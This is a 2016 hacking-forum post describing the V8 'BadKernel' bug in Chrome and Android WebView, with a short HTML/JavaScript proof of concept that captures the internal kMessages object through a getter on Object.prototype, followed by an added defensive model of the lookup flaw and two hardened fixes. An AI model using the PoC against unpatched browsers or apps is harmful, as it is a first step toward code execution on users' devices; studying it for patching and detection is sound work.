HackerTop - View topic - Google Chrome V8 BadKernel Vulnerability
 Google Chrome V8 BadKernel Vulnerability 

Joined: Sun Jul 24, 2016 12:11 pm
Posts: 10
Google V8 is the open source JavaScript engine developed for the Chrome browser.

The vulnerability is due to the exception type "observe_accept_invalid" in the source code being mistakenly written as "observe_invalid_accept".

An attacker can use the vulnerability to cause leakage of the kMessages key object and execution of arbitrary code.

Mobile phone apps developed using the system WebView control on Android 4.4.4 to 5.1 are likely to be affected by the vulnerability.

Google Chrome V8: versions 3.20 ~ 4.2

Android: versions 4.4.4 ~ 5.1

Proof of Concept
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript">
    var kMessages;
    // Getter on Object.prototype: when V8 misses this key on its internal message table, the lookup walks up the prototype chain and hands the table to us as `this`.
    Object.prototype.__defineGetter__("observe_accept_invalid", function(){ kMessages = this; });
    try {
        Object.observe({}, function(){}, 1); // invalid accept list (not an array) triggers the misspelled message lookup
    } catch(e) {
    }
    delete Object.prototype["observe_accept_invalid"];
    document.write(kMessages); // output line added to match the check described in the post: object name on a vulnerable build, "undefined" otherwise
</script>

Open this page in the browser: if the kMessages object can be obtained, the output is the object name and the browser is vulnerable.

If the output is undefined, the browser is not vulnerable.



http://www.cnnvd.org.cn/vulnerability/s ... 2016080414

Tue Aug 23, 2016 11:14 am
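As an added example (not part of the original post), the prototype-chain fall-through that the PoC relies on, modeled in plain JavaScript with a constructed stand-in table rather than V8's real kMessages, beside two hardened lookups a defender would use so that a misspelled key can never reach a getter installed on Object.prototype. The function and key names below are illustrative assumptions, not V8 identifiers.

```javascript
// Added example (not from the original post): models the lookup pattern behind
// the BadKernel bug. A message table is indexed by a key name; if the key is
// misspelled, the lookup misses the table's own properties and walks up to
// Object.prototype, where a getter installed by page script receives the table
// itself as `this`. Two hardened variants show how to close that path.

// Constructed stand-in for V8's internal message table (not the real kMessages).
function makeTable() {
  return { observe_invalid_accept: "Object.observe accept list is invalid" };
}

// Vulnerable lookup: a plain object literal inherits from Object.prototype,
// so a missing key falls through to whatever the page has defined there.
function lookupVulnerable(table, key) {
  return table[key];
}

// Hardened lookup 1: consult only the table's own properties.
function lookupOwnOnly(table, key) {
  return Object.prototype.hasOwnProperty.call(table, key) ? table[key] : undefined;
}

// Hardened lookup 2: build the table with no prototype at all, so there is
// no chain to walk even when a misspelled key is looked up naively.
function makeNullProtoTable() {
  const t = Object.create(null);
  t.observe_invalid_accept = "Object.observe accept list is invalid";
  return t;
}

// Runs one lookup while a getter for `key` sits on Object.prototype (the way
// the PoC installs one) and reports whether the getter ever received the table.
function probe(makeFn, lookupFn, key) {
  let leaked = null;
  Object.defineProperty(Object.prototype, key, {
    get() { leaked = this; return undefined; },
    configurable: true,
  });
  try {
    const table = makeFn();
    lookupFn(table, key);
    return leaked === table;
  } finally {
    delete Object.prototype[key]; // always clean up the injected getter
  }
}

// Returns which variants leak the table for the misspelled key.
function demo() {
  const typoKey = "observe_accept_invalid"; // the key name from the bug report
  return {
    vulnerable: probe(makeTable, lookupVulnerable, typoKey),
    ownOnly: probe(makeTable, lookupOwnOnly, typoKey),
    nullProto: probe(makeNullProtoTable, lookupVulnerable, typoKey),
  };
}

console.log(demo());
```

Only the plain-object lookup leaks the table; both the own-property check and the null-prototype table return undefined without ever invoking the getter, which is the same property the V8 fix restored by making the engine-side key name and the table key agree.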
Copyright © 2003-2016 HackerTop. All rights reserved.